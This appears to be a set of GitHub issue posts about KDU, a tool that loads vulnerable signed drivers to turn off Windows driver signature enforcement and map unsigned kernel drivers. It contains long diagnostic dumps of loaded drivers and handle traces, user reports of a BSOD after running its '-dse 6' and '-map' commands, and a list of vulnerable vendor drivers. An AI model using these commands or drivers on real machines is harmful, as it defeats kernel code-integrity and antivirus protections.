>         87 FFFFF801249E0000 114688 \SystemRoot\System32\Drivers\Npfs.SYS
>         88 FFFFF80124A00000 73728 \SystemRoot\System32\Drivers\Msfs.SYS
>         89 FFFFF80124A20000 163840 \SystemRoot\System32\Drivers\CimFS.SYS
>         90 FFFFF80124A50000 147456 \SystemRoot\system32\DRIVERS\klwfp.sys
>         91 FFFFF80124A80000 147456 \SystemRoot\system32\DRIVERS\tdx.sys
>         92 FFFFF80124AB0000 69632 \SystemRoot\system32\DRIVERS\TDI.SYS
>         93 FFFFF80124AD0000 331776 \SystemRoot\System32\DRIVERS\netbt.sys
>         94 FFFFF80124B30000 81920 \SystemRoot\system32\drivers\afunix.sys
>         95 FFFFF80124C70000 688128 \SystemRoot\system32\drivers\afd.sys
>         96 FFFFF80124D20000 315392 \SystemRoot\system32\DRIVERS\klwtp.sys
>         97 FFFFF80124D70000 90112 \SystemRoot\system32\DRIVERS\klim6.sys
>         98 FFFFF80124D90000 110592 \SystemRoot\System32\drivers\vwififlt.sys
>         99 FFFFF80124DB0000 176128 \SystemRoot\System32\drivers\pacer.sys
>         100 FFFFF80124DE0000 86016 \SystemRoot\System32\drivers\ndiscap.sys
>         101 FFFFF80124B50000 86016 \SystemRoot\system32\drivers\netbios.sys
>         102 FFFFF80126480000 819200 \SystemRoot\System32\drivers\Vid.sys
>         103 FFFFF80126550000 163840 \SystemRoot\System32\drivers\winhvr.sys
>         104 FFFFF80126580000 86016 \SystemRoot\system32\DRIVERS\klpnpflt.sys
>         105 FFFFF80126000000 512000 \SystemRoot\system32\DRIVERS\rdbss.sys
>         106 FFFFF80126080000 262144 \SystemRoot\System32\drivers\ViGEmBus.sys
>         107 FFFFF801260D0000 77824 \SystemRoot\system32\drivers\nsiproxy.sys
>         108 FFFFF801260F0000 65536 \SystemRoot\System32\drivers\npsvctrig.sys
>         109 FFFFF80126110000 69632 \SystemRoot\System32\drivers\mssmbios.sys
>         110 FFFFF80126130000 299008 \SystemRoot\system32\DRIVERS\kneps.sys
>         111 FFFFF80126180000 229376 \??\C:\ProgramData\Kaspersky Lab\AVP21.3\Bases\klids.sys
>         112 FFFFF801261C0000 184320 \SystemRoot\System32\Drivers\dfsc.sys
>         113 FFFFF80126230000 450560 \SystemRoot\System32\Drivers\fastfat.SYS
>         114 FFFFF801262A0000 106496 \SystemRoot\system32\drivers\bam.sys
>         115 FFFFF801262C0000 376832 \SystemRoot\system32\DRIVERS\ahcache.sys
>         116 FFFFF80126320000 61440 \SystemRoot\System32\drivers\amdxe.sys
>         117 FFFFF80126330000 176128 \SystemRoot\System32\drivers\amdfendr.sys
>         118 FFFFF80126360000 81920 \SystemRoot\System32\DriverStore\FileRepository\compositebus.inf_amd64_2e50c98177d80a40\CompositeBus.sys
>         119 FFFFF80126380000 61440 \SystemRoot\System32\drivers\kdnic.sys
>         120 FFFFF80126390000 114688 \SystemRoot\System32\DriverStore\FileRepository\amdsafd.inf_amd64_1a1a381a2c0e293c\amdsafd.sys
>         121 FFFFF801263B0000 471040 \SystemRoot\System32\drivers\portcls.sys
>         122 FFFFF80126430000 143360 \SystemRoot\System32\drivers\drmk.sys
>         123 FFFFF80126460000 65536 \SystemRoot\system32\drivers\ksthunk.sys
>         124 FFFFF801265A0000 94208 \SystemRoot\System32\DriverStore\FileRepository\umbus.inf_amd64_8ee833e5ca48d1de\umbus.sys
>         125 FFFFF801270D0000 667648 \SystemRoot\System32\drivers\USBXHCI.SYS
>         126 FFFFF80127180000 286720 \SystemRoot\system32\drivers\ucx01000.sys
>         127 FFFFF80126600000 712704 \SystemRoot\System32\DriverStore\FileRepository\rt25cx21x64.inf_amd64_affac63db0770a78\rt25cx21x64.sys
>         128 FFFFF801266B0000 389120 \SystemRoot\system32\drivers\NetAdapterCx.sys
>         129 FFFFF801388D0000 94785536 \SystemRoot\System32\DriverStore\FileRepository\u0386458.inf_amd64_e0283e9e7966f704\B386218\amdkmdag.sys
>         130 FFFFF8013E340000 192512 \SystemRoot\System32\drivers\HDAudBus.sys
>         131 FFFFF8013E370000 45056 \SystemRoot\System32\drivers\AMDPCIDev.sys
>         132 FFFFF8013E380000 53248 \SystemRoot\System32\drivers\amdgpio2.sys
>         133 FFFFF8013E390000 208896 \SystemRoot\System32\Drivers\msgpioclx.sys
>         134 FFFFF8013E3D0000 53248 \SystemRoot\System32\drivers\wmiacpi.sys
>         135 FFFFF80138600000 282624 \SystemRoot\System32\drivers\amdppm.sys
>         136 FFFFF80138650000 45056 \SystemRoot\System32\drivers\amdgpio3.sys
>         137 FFFFF80138660000 69632 \SystemRoot\System32\DriverStore\FileRepository\uefi.inf_amd64_3abb917fc03c6fa8\UEFI.sys
>         138 FFFFF801386E0000 40960 \SystemRoot\System32\drivers\amdfendrmgr.sys
>         139 FFFFF801386F0000 61440 \SystemRoot\System32\drivers\dtliteusbbus.sys
>         140 FFFFF80138700000 57344 \SystemRoot\System32\drivers\NdisVirtualBus.sys
>         141 FFFFF80138710000 49152 \SystemRoot\System32\DriverStore\FileRepository\swenum.inf_amd64_d84a235075a8ff73\swenum.sys
>         142 FFFFF80138720000 45056 \SystemRoot\System32\drivers\AWCCDriver.sys
>         143 FFFFF80138730000 69632 \SystemRoot\System32\drivers\HidHide.sys
>         144 FFFFF80138750000 45056 \SystemRoot\System32\drivers\dtlitescsibus.sys
>         145 FFFFF80138760000 65536 \SystemRoot\System32\drivers\rdpbus.sys
>         146 FFFFF80138780000 712704 \SystemRoot\System32\drivers\UsbHub3.sys
>         147 FFFFF80138830000 61440 \SystemRoot\System32\drivers\USBD.SYS
>         148 FFFFF80138840000 253952 \SystemRoot\system32\drivers\AtihdWT6.sys
>         149 FFFFF80126710000 528384 \SystemRoot\System32\drivers\HdAudio.sys
>         150 FFFFF80138880000 77824 \SystemRoot\System32\drivers\hidusb.sys
>         151 FFFFF80138680000 278528 \SystemRoot\System32\drivers\HIDCLASS.SYS
>         152 FFFFF801388A0000 90112 \SystemRoot\System32\drivers\HIDPARSE.SYS
>         153 FFFFF8013E3E0000 69632 \SystemRoot\System32\drivers\mouhid.sys
>         154 FFFFF801267A0000 106496 \SystemRoot\system32\DRIVERS\klmouflt.sys
>         155 FFFFF801267C0000 86016 \SystemRoot\System32\drivers\mouclass.sys
>         156 FFFFF801267E0000 73728 \SystemRoot\System32\drivers\kbdhid.sys
>         157 FFFFF80126800000 102400 \SystemRoot\system32\DRIVERS\klkbdflt.sys
>         158 FFFFF80126820000 86016 \SystemRoot\System32\drivers\kbdclass.sys
>         159 FFFFF80126840000 163840 \SystemRoot\System32\drivers\USBSTOR.SYS
>         160 FFFFF80126870000 221184 \SystemRoot\System32\drivers\usbccgp.sys
>         161 FFFFFD379FB50000 696320 \SystemRoot\System32\win32k.sys
>         162 FFFFF801386D0000 49152 \SystemRoot\System32\WIN32KSGD.SYS
>         163 FFFFFD379F600000 3604480 \SystemRoot\System32\win32kbase.sys
>         164 FFFFFD37A06A0000 3837952 \SystemRoot\System32\win32kfull.sys
>         165 FFFFF801268D0000 69632 \SystemRoot\System32\Drivers\dump_dumpstorport.sys
>         166 FFFFF80126930000 241664 \SystemRoot\System32\drivers\dump_stornvme.sys
>         167 FFFFF80126990000 122880 \SystemRoot\System32\Drivers\dump_dumpfve.sys
>         168 FFFFF801269B0000 1138688 \SystemRoot\System32\drivers\dxgmms2.sys
>         169 FFFFF80126AD0000 122880 \SystemRoot\System32\drivers\monitor.sys
>         170 FFFFFD37A0A50000 286720 \SystemRoot\System32\cdd.dll
>         171 FFFFF80126AF0000 356352 \SystemRoot\System32\drivers\WUDFRd.sys
>         172 FFFFF80126B50000 81920 \SystemRoot\system32\drivers\bfs.sys
>         173 FFFFF80126B70000 172032 \SystemRoot\system32\drivers\luafv.sys
>         174 FFFFF80126BA0000 241664 \SystemRoot\system32\drivers\wcifs.sys
>         175 FFFFF80126BE0000 196608 \SystemRoot\System32\drivers\rdpdr.sys
>         176 FFFFF801388C0000 61440 \SystemRoot\System32\drivers\WpdUpFltr.sys
>         177 FFFFF80126C20000 573440 \SystemRoot\system32\drivers\cldflt.sys
>         178 FFFFF80126CB0000 110592 \SystemRoot\system32\drivers\storqosflt.sys
>         179 FFFFF80126CD0000 163840 \SystemRoot\system32\drivers\bindflt.sys
>         180 FFFFF80126D00000 155648 \SystemRoot\system32\DRIVERS\bowser.sys
>         181 FFFFF80126D30000 434176 \SystemRoot\system32\drivers\msquic.sys
>         182 FFFFF80126DA0000 655360 \SystemRoot\system32\DRIVERS\mrxsmb.sys
>         183 FFFFF80126E50000 323584 \SystemRoot\system32\DRIVERS\mrxsmb20.sys
>         184 FFFFF80126EA0000 102400 \SystemRoot\system32\drivers\lltdio.sys
>         185 FFFFF80126EC0000 102400 \SystemRoot\system32\drivers\mslldp.sys
>         186 FFFFF80126EE0000 118784 \SystemRoot\system32\drivers\rspndr.sys
>         187 FFFFF80126F00000 126976 \SystemRoot\System32\DRIVERS\wanarp.sys
>         188 FFFFF80126F20000 757760 \SystemRoot\system32\DRIVERS\nwifi.sys
>         189 FFFFF80126FE0000 102400 \SystemRoot\system32\drivers\ndisuio.sys
>         190 FFFFF80127000000 110592 \SystemRoot\System32\drivers\mpsdrv.sys
>         191 FFFFF80127020000 90112 \SystemRoot\system32\drivers\mmcss.sys
>         192 FFFFF80127040000 53248 \??\C:\Windows\system32\AMDRyzenMasterDriver.sys
>         193 FFFFF80127050000 372736 \SystemRoot\System32\DRIVERS\srvnet.sys
>         194 FFFFF80123300000 856064 \SystemRoot\system32\drivers\peauth.sys
>         195 FFFFF801574B0000 872448 \SystemRoot\System32\DRIVERS\srv2.sys
>         196 FFFFF80157590000 77824 \SystemRoot\System32\drivers\condrv.sys
>         197 FFFFF801575B0000 266240 \SystemRoot\System32\Drivers\klupd_klif_mark.sys
>         198 FFFFF80156600000 6111232 \??\C:\Users\hiper\OneDrive\Masa³st³\KDmapper\NalDrv.sys
>         199 FFFFF80156BE0000 1777664 \SystemRoot\system32\drivers\HTTP.sys
>         200 FFFFF80156DA0000 352256 \SystemRoot\System32\Drivers\klupd_klif_klark.sys
> > List of device and driver objects in the common locations
>         \ -> clfs
>         \ -> FatCdrom
>         \ -> Fat
>         \ -> Ntfs
>         \Device -> 0000006a
>         \Device -> 00000058
>         \Device -> GPIO_1
>         \Device -> 00000044
>         \Device -> NTPNP_PCI0030
>         \Device -> NTPNP_PCI0002
>         \Device -> 00000030
>         \Device -> Nal
>         \Device -> 00000068
>         \Device -> USBPDO-9
>         \Device -> 00000054
>         \Device -> GPIO_2
>         \Device -> AmdLog
>         \Device -> KLIM6_DUMMYklim6
>         \Device -> NTPNP_PCI0031
>         \Device -> NTPNP_PCI0003
>         \Device -> 00000064
>         \Device -> USBPDO-5
>         \Device -> 00000050
>         \Device -> MSGpioClassExt0
>         \Device -> NTPNP_PCI0032
>         \Device -> NTPNP_PCI0004
>         \Device -> MSSGRMAGENTSYS
>         \Device -> 0000000f
>         \Device -> MMCSS
>         \Device -> lltdio
>         \Device -> 00000074
>         \Device -> 00000060
>         \Device -> USBPDO-1
>         \Device -> Bam
>         \Device -> Psched
>         \Device -> Tcp6
>         \Device -> NTPNP_PCI0033
>         \Device -> NTPNP_PCI0005
>         \Device -> 0000001f
>         \Device -> 0000000b
>         \Device -> Ndisuio
>         \Device -> 00000070
>         \Device -> FakeVid10
>         \Device -> RaidPort0
>         \Device -> NTPNP_PCI0034
>         \Device -> NTPNP_PCI0006
>         \Device -> 0000002f
>         \Device -> 0000001b
>         \Device -> 00000009
>         \Device -> SrvAdmin
>         \Device -> FakeVid11
>         \Device -> FakeVid8
>         \Device -> KlDiskCtl
>         \Device -> RaidPort1
>         \Device -> 0000003f
>         \Device -> NTPNP_PCI0035
>         \Device -> NTPNP_PCI0007
>         \Device -> 0000002b
>         \Device -> 00000019
>         \Device -> 00000005
>         \Device -> FakeVid12
>         \Device -> FakeVid4
>         \Device -> 0000004f
>         \Device -> ahcache
>         \Device -> NTPNP_PCI0036
>         \Device -> 0000003b
>         \Device -> NTPNP_PCI0008
>         \Device -> 00000029
>         \Device -> 00000015
>         \Device -> 00000001
>         \Device -> FakeVid13
>         \Device -> FakeVid0
>         \Device -> 0000005f
>         \Device -> _HID00000001
>         \Device -> 0000004b
>         \Device -> IPSECDOSP
>         \Device -> NTPNP_PCI0037
>         \Device -> 00000039
>         \Device -> NTPNP_PCI0009
>         \Device -> 00000025
>         \Device -> 00000011
>         \Device -> klnkd_061303_KLIF
>         \Device -> PEAuth
>         \Device -> FakeVid14
>         \Device -> 0000005b
>         \Device -> 00000049
>         \Device -> NTPNP_PCI0038
>         \Device -> 00000035
>         \Device -> 00000021
>         \Device -> WMIDataDevice
>         \Device -> MPS
>         \Device -> FakeVid15
>         \Device -> 0000006b
>         \Device -> 00000059
>         \Device -> 00000045
>         \Device -> Spaceport
>         \Device -> NTPNP_PCI0039
>         \Device -> 00000031
>         \Device -> LanmanDatagramReceiver
>         \Device -> 00000069
>         \Device -> 00000055
>         \Device -> vwififlt
>         \Device -> WFPL2DPConfig
>         \Device -> ConDrv
>         \Device -> RdpDrPort
>         \Device -> UMDFCtrlDev-38762bd4-7e0f-11ed-8c4e-806e6f6e6963
>         \Device -> 00000065
>         \Device -> USBPDO-6
>         \Device -> 00000051
>         \Device -> Tcp
>         \Device -> DxgKrnl
>         \Device -> NTPNP_PCI0010
>         \Device -> 00000075
>         \Device -> 00000061
>         \Device -> RealTekCard{C71C7B73-2EA3-4E74-A704-ECD4A71B8E26}
>         \Device -> USBPDO-2
>         \Device -> USBFDO-0
>         \Device -> Null
>         \Device -> NTPNP_PCI0011
>         \Device -> 0000000c
>         \Device -> WANARP
>         \Device -> 00000071
>         \Device -> Udp6
>         \Device -> NamedPipe
>         \Device -> NTPNP_PCI0012
>         \Device -> 0000001c
>         \Device -> LLDPCTRL
>         \Device -> RdpDrDvMgr
>         \Device -> FakeVid9
>         \Device -> Video0
>         \Device -> Kneps
>         \Device -> NTPNP_PCI0013
>         \Device -> 0000002c
>         \Device -> 00000006
>         \Device -> FakeVid5
>         \Device -> Video1
>         \Device -> NXTIPSEC
>         \Device -> KsecDD
>         \Device -> 0000003c
>         \Device -> NTPNP_PCI0014
>         \Device -> 00000016
>         \Device -> 00000002
>         \Device -> DeviceApi
>         \Device -> FakeVid1
>         \Device -> Video2
>         \Device -> _HID00000002
>         \Device -> 0000004c
>         \Device -> WFPL2
>         \Device -> MountPointManager
>         \Device -> NTPNP_PCI0015
>         \Device -> 00000026
>         \Device -> CNG
>         \Device -> 00000012
>         \Device -> SrvNet
>         \Device -> Video3
>         \Device -> 0000005c
>         \Device -> lwm
>         \Device -> 00000036
>         \Device -> NTPNP_PCI0016
>         \Device -> 00000022
>         \Device -> KMDF0
>         \Device -> 0000006c
>         \Device -> Video4
>         \Device -> HidHide
>         \Device -> 00000046
>         \Device -> NTPNP_PCI0017
>         \Device -> 00000032
>         \Device -> Video5
>         \Device -> 00000056
>         \Device -> KLWTP_DUMMY
>         \Device -> 00000042
>         \Device -> NTPNP_PCI0018
>         \Device -> UMDFCtrlDev-38762bd0-7e0f-11ed-8c4e-806e6f6e6963
>         \Device -> Video6
>         \Device -> 00000066
>         \Device -> USBPDO-7
>         \Device -> 00000052
>         \Device -> netadaptercx0
>         \Device -> WFP
>         \Device -> NTPNP_PCI0019
>         \Device -> 00000076
>         \Device -> Video7
>         \Device -> 00000062
>         \Device -> USBPDO-3
>         \Device -> USBFDO-1
>         \Device -> amdpsp
>         \Device -> 0000000d
>         \Device -> WwanProt
>         \Device -> 00000072
>         \Device -> DrDynVc
>         \Device -> Mailslot
>         \Device -> HarddiskVolume1
>         \Device -> RawCdRom
>         \Device -> 0000001d
>         \Device -> WANARPV6
>         \Device -> kneps_DUMMY
>         \Device -> RawIp6
>         \Device -> RawIp
>         \Device -> Tdx
>         \Device -> HarddiskVolumeShadowCopy1
>         \Device -> HarddiskVolume2
>         \Device -> VolMgrControl
>         \Device -> 0000002d
>         \Device -> 00000007
>         \Device -> FakeVid6
>         \Device -> PointerClass0
>         \Device -> Nsi
>         \Device -> FsWrap
>         \Device -> HarddiskVolume3
>         \Device -> Mup
>         \Device -> kl_cm.{EE198DD8-F4ED-4799-A748-5A130DE3050E}
>         \Device -> 0000003d
>         \Device -> NTPNP_PCI0020
>         \Device -> WindowsTrustedRT
>         \Device -> 00000017
>         \Device -> 00000003
>         \Device -> FakeVid2
>         \Device -> PointerClass1
>         \Device -> _HID00000003
>         \Device -> 0000004d
>         \Device -> Udp
>         \Device -> HarddiskVolume4
>         \Device -> RawTape
>         \Device -> NTPNP_PCI0021
>         \Device -> 00000027
>         \Device -> 00000013
>         \Device -> klark_041403_KLIF
>         \Device -> Bfs
>         \Device -> 0000005d
>         \Device -> RdpBus
>         \Device -> KLWTP
>         \Device -> HarddiskVolume5
>         \Device -> 00000037
>         \Device -> NTPNP_PCI0022
>         \Device -> 00000023
>         \Device -> 0000006d
>         \Device -> 00000047
>         \Device -> HarddiskVolume6
>         \Device -> NTPNP_PCI0023
>         \Device -> 00000033
>         \Device -> rspndr
>         \Device -> UMDFCtrlDev-38762bfc-7e0f-11ed-8c4e-c5ba839355fb
>         \Device -> UMDFCtrlDev-38762bf3-7e0f-11ed-8c4e-c5ba839355fb
>         \Device -> 00000057
>         \Device -> NetBt_Wins_Export
>         \Device -> 00000043
>         \Device -> HarddiskVolume7
>         \Device -> FileInfo
>         \Device -> NTPNP_PCI0024
>         \Device -> 00000067
>         \Device -> HarddiskVolume8
>         \Device -> USBPDO-8
>         \Device -> 00000053
>         \Device -> klbg_111403_KLIF
>         \Device -> arkmon_021304_KLIF
>         \Device -> NTPNP_PCI0025
>         \Device -> RESOURCE_HUB
>         \Device -> 00000063
>         \Device -> HarddiskVolume9
>         \Device -> KeyboardClass0
>         \Device -> USBPDO-4
>         \Device -> KLIM6klim6
>         \Device -> WfpAle
>         \Device -> Ndis
>         \Device -> NTPNP_PCI0026
>         \Device -> 0000000e
>         \Device -> 00000073
>         \Device -> KeyboardClass1
>         \Device -> USBPDO-0
>         \Device -> DfsClient
>         \Device -> PartmgrControl
>         \Device -> PcwDrv
>         \Device -> NTPNP_PCI0027
>         \Device -> 0000001e
>         \Device -> 0000000a
>         \Device -> KeyboardClass2
>         \Device -> UCX0
>         \Device -> KLWFP_DUMMY
>         \Device -> RdyBoost
>         \Device -> NTPNP_PCI0028
>         \Device -> PciControl
>         \Device -> 0000002e
>         \Device -> 0000001a
>         \Device -> 00000008
>         \Device -> Srv2
>         \Device -> AMDRyzenMasterDriverV19
>         \Device -> FakeVid7
>         \Device -> KeyboardClass3
>         \Device -> Netbios
>         \Device -> Beep
>         \Device -> eQoS
>         \Device -> 0000003e
>         \Device -> RawDisk
>         \Device -> NTPNP_PCI0029
>         \Device -> 0000002a
>         \Device -> 00000018
>         \Device -> 00000004
>         \Device -> FakeVid3
>         \Device -> KeyboardClass4
>         \Device -> _HID00000004
>         \Device -> 0000004e
>         \Device -> NetBT_Tcpip_{C71C7B73-2EA3-4E74-A704-ECD4A71B8E26}
>         \Device -> VRegDriver
>         \Device -> Afd
>         \Device -> 0000003a
>         \Device -> 00000028
>         \Device -> 00000014
>         \Device -> KeyboardClass5
>         \Device -> 0000005e
>         \Device -> _HID00000000
>         \Device -> AWCCDevice
>         \Device -> 0000004a
>         \Device -> NameResTrk
>         \Device -> BitLocker
>         \Device -> 00000038
>         \Device -> NTPNP_PCI0000
>         \Device -> 00000024
>         \Device -> 00000010
>         \Device -> 0000006e
>         \Device -> 0000005a
>         \Device -> 00000048
>         \Device -> 00000034
>         \Device -> NTPNP_PCI0001
>         \Device -> 00000020
>         \Driver -> klkbdflt
>         \Driver -> amdgpio2
>         \Driver -> fvevol
>         \Driver -> vdrvroot
>         \Driver -> NetBT
>         \Driver -> acpiex
>         \Driver -> Wdf01000
>         \Driver -> mpsdrv
>         \Driver -> storahci
>         \Driver -> MMCSS
>         \Driver -> lltdio
>         \Driver -> bam
>         \Driver -> Psched
>         \Driver -> BasicRender
>         \Driver -> disk
>         \Driver -> HTTP
>         \Driver -> NalDrv
>         \Driver -> Ndisuio
>         \Driver -> stornvme
>         \Driver -> klupd_klif_arkmon
>         \Driver -> WscVReg
>         \Driver -> monitor
>         \Driver -> ahcache
>         \Driver -> iorate
>         \Driver -> pcw
>         \Driver -> klupd_klif_klark
>         \Driver -> AmdPPM
>         \Driver -> rt25cx21
>         \Driver -> Ucx01000
>         \Driver -> USBXHCI
>         \Driver -> partmgr
>         \Driver -> PEAUTH
>         \Driver -> MsLldp
>         \Driver -> klmouflt
>         \Driver -> AWCCDriver
>         \Driver -> Vid
>         \Driver -> klim6
>         \Driver -> ACPI_HAL
>         \Driver -> amdgpio3
>         \Driver -> spaceport
>         \Driver -> USBSTOR
>         \Driver -> HidUsb
>         \Driver -> vwififlt
>         \Driver -> condrv
>         \Driver -> DXGKrnl
>         \Driver -> PnpManager
>         \Driver -> RDPDR
>         \Driver -> Null
>         \Driver -> intelpep
>         \Driver -> PRM
>         \Driver -> wanarp
>         \Driver -> SoftwareDevice
>         \Driver -> kneps
>         \Driver -> klflt
>         \Driver -> CLFS
>         \Driver -> WindowsTrustedRTProxy
>         \Driver -> AMDXE
>         \Driver -> NdisCap
>         \Driver -> KSecDD
>         \Driver -> volmgr
>         \Driver -> DeviceApi
>         \Driver -> umbus
>         \Driver -> klpnpflt
>         \Driver -> klbackupdisk
>         \Driver -> CNG
>         \Driver -> Win32k
>         \Driver -> amdfendrmgr
>         \Driver -> npsvctrig
>         \Driver -> volume
>         \Driver -> KSecPkg
>         \Driver -> TPM
>         \Driver -> mouclass
>         \Driver -> HidHide
>         \Driver -> NativeWifiP
>         \Driver -> msisadrv
>         \Driver -> IntelPMT
>         \Driver -> kbdclass
>         \Driver -> dtliteusbbus
>         \Driver -> AMDPCIDev
>         \Driver -> mouhid
>         \Driver -> dtlitescsibus
>         \Driver -> AMDSAFD
>         \Driver -> volsnap
>         \Driver -> amdpsp
>         \Driver -> GPIOClx0101
>         \Driver -> nsiproxy
>         \Driver -> WMIxWDM
>         \Driver -> MsQuic
>         \Driver -> tdx
>         \Driver -> WindowsTrustedRT
>         \Driver -> HDAudBus
>         \Driver -> BasicDisplay
>         \Driver -> rdpbus
>         \Driver -> klwtp
>         \Driver -> klhk
>         \Driver -> kbdhid
>         \Driver -> AtiHDAudioService
>         \Driver -> UEFI
>         \Driver -> pdc
>         \Driver -> rspndr
>         \Driver -> WpdUpFltr
>         \Driver -> WmiAcpi
>         \Driver -> klupd_klif_klbg
>         \Driver -> HdAudAddService
>         \Driver -> NetAdapterCx
>         \Driver -> mssmbios
>         \Driver -> klwfp
>         \Driver -> volmgrx
>         \Driver -> pci
>         \Driver -> NdisVirtualBus
>         \Driver -> kdnic
>         \Driver -> cdrom
>         \Driver -> NDIS
>         \Driver -> cm_km
>         \Driver -> swenum
>         \Driver -> amdfendr
>         \Driver -> klids
>         \Driver -> rdyboost
>         \Driver -> WFPLWFS
>         \Driver -> Tcpip
>         \Driver -> SgrmAgent
>         \Driver -> klupd_klif_mark
>         \Driver -> AMDRyzenMasterDriverV19
>         \Driver -> USBHUB3
>         \Driver -> Beep
>         \Driver -> kldisk
>         \Driver -> usbccgp
>         \Driver -> amdwddmg
>         \Driver -> AFD
>         \Driver -> mountmgr
>         \Driver -> ksthunk
>         \Driver -> ViGEmBus
>         \Driver -> afunix
>         \Driver -> WudfRd
>         \Driver -> CompositeBus
>         \Driver -> EhStorClass
>         \Driver -> ACPI
> > Process (self) handle trace
>         >> 0xFFFFF80114ACCFD7, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0xFFFFF80114ACD423, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0xFFFFF8011483D4E8, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0x00007FF8B60EF2C4, ntdll.dll, base 0x00007FF8B6050000
>         >> 0x00007FF63FC0F928, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0FD5C, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0FFEB, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC09F3D, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0A829, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0AA0E, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC10820, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF8B44C26BD, KERNEL32.DLL, base 0x00007FF8B44B0000
>         >> 0x00007FF8B60ADFB8, ntdll.dll, base 0x00007FF8B6050000
> > Thread handle trace
>         >> 0xFFFFF80114BB1522, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0xFFFFF80114BB1303, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0xFFFFF8011483D4E8, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0x00007FF8B60F14D4, ntdll.dll, base 0x00007FF8B6050000
>         >> 0x00007FF63FC0F997, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0FD5C, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0FFEB, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC09F3D, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0A829, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0AA0E, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC10820, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF8B44C26BD, KERNEL32.DLL, base 0x00007FF8B44B0000
>         >> 0x00007FF8B60ADFB8, ntdll.dll, base 0x00007FF8B6050000
> > Process (1188) handle trace
> Cannot open process, NTSTATUS (0xC0000022)
> > Section handle trace
>         >> 0xFFFFF80114ACF260, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0xFFFFF80114ACF3CC, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0xFFFFF8011483D4E8, \SystemRoot\system32\ntoskrnl.exe, base 0xFFFFF80114400000
>         >> 0x00007FF8B60EF744, ntdll.dll, base 0x00007FF8B6050000
>         >> 0x00007FF63FC0FABB, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0FE06, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0FFEB, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC09F3D, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0A829, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC0AA0E, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF63FC10820, kdu.exe, base 0x00007FF63FC00000
>         >> 0x00007FF8B44C26BD, KERNEL32.DLL, base 0x00007FF8B44B0000
>         >> 0x00007FF8B60ADFB8, ntdll.dll, base 0x00007FF8B6050000
> > Analyzing process working set
>         >> ThreadId [10820] Pc 00007FF8B60EF184 (ntdll.dll) : Va 00007FF8B60EF185 (ntdll.dll)
>         >> ThreadId [10820] Pc 00007FF8B60EF184 (ntdll.dll) : Va 000000000014CE09 (Unknown)
>         >> ThreadId [10820] Pc 00007FF63FC0F4AF (kdu.exe) : Va 00007FF63FC0F4AF (kdu.exe)
>         >> ThreadId [10820] Pc 00007FF63FC0F4C2 (kdu.exe) : Va 000000000014CE31 (Unknown)
>         >> ThreadId [10820] Pc 00007FF63FC0F4D3 (kdu.exe) : Va 00007FF63FC2A609 (kdu.exe)
>         >> ThreadId [10820] Pc 00007FF8B60EF118 (ntdll.dll) : Va 000000007FFE0309 (Unknown)
> > List of registered minifilters
>         >> bindflt
>         >> WdFilter
>         >> KLIF
>         >> storqosflt
>         >> wcifs
>         >> CldFlt
>         >> bfs
>         >> FileCrypt
>         >> luafv
>         >> klbackupflt
>         >> npsvctrig
>         >> Wof
>         >> FileInfo
> > Physical memory layout
> ResourceList Count 1
> pDesc[0].PartialResourceList.Count 7
> #0 Flags 0x0000 0x0000000000001000::0x00000000000A0000 (length 0x000000000009F000, 0 Mb)
> #1 Flags 0x0000 0x0000000000100000::0x0000000009E02000 (length 0x0000000009D02000, 157 Mb)
> #2 Flags 0x0000 0x000000000A000000::0x000000000A200000 (length 0x0000000000200000, 2 Mb)
> #3 Flags 0x0000 0x000000000A20E000::0x000000000B000000 (length 0x0000000000DF2000, 13 Mb)
> #4 Flags 0x0000 0x000000000B020000::0x00000000CB147000 (length 0x00000000C0127000, 3073 Mb)
> #5 Flags 0x0000 0x00000000CDBFF000::0x00000000CF000000 (length 0x0000000001401000, 20 Mb)
> #6 Flags 0x0200 0x0000000100000000::0x000000042F380000 (length 0x000000032F380000, 13043 Mb)
> [+] Return value: 1. Bye-bye!

BSOD

After using -dse 6 and -map Driver.sys my pc would BSOD after a while (sometimes very soon sometimes takes a bit) with the error CRITICAL_STRUCTURE_CORRUPTION on CI.dll

any idea for a fix? i see that Ci dll is loaded by kdu so im guessing thats where the issue originated from

image
minidump file below

082323-9531-01.zip

[!] Could not load drivers database, GetLastError 2

Get this error when trying to load a dummy driver. I looked it up and it says that im missing 1 or more dll files. I imagine it has something to do with building the dlls in the main source file but i dont know where to put the dll files.
image

List of checked providers

Below is the list of drivers checked during KDU development which are for some reason(s) did not get the opportunity to get into it.

  1. AMI amifldrv64.sys - from BIOS flashing tool, based on MAPMEM. Disadvantage: driver is very old.

  2. ASUS AsIO3.sys - from infamous EneTech dev who loves to copy-paste from Google.
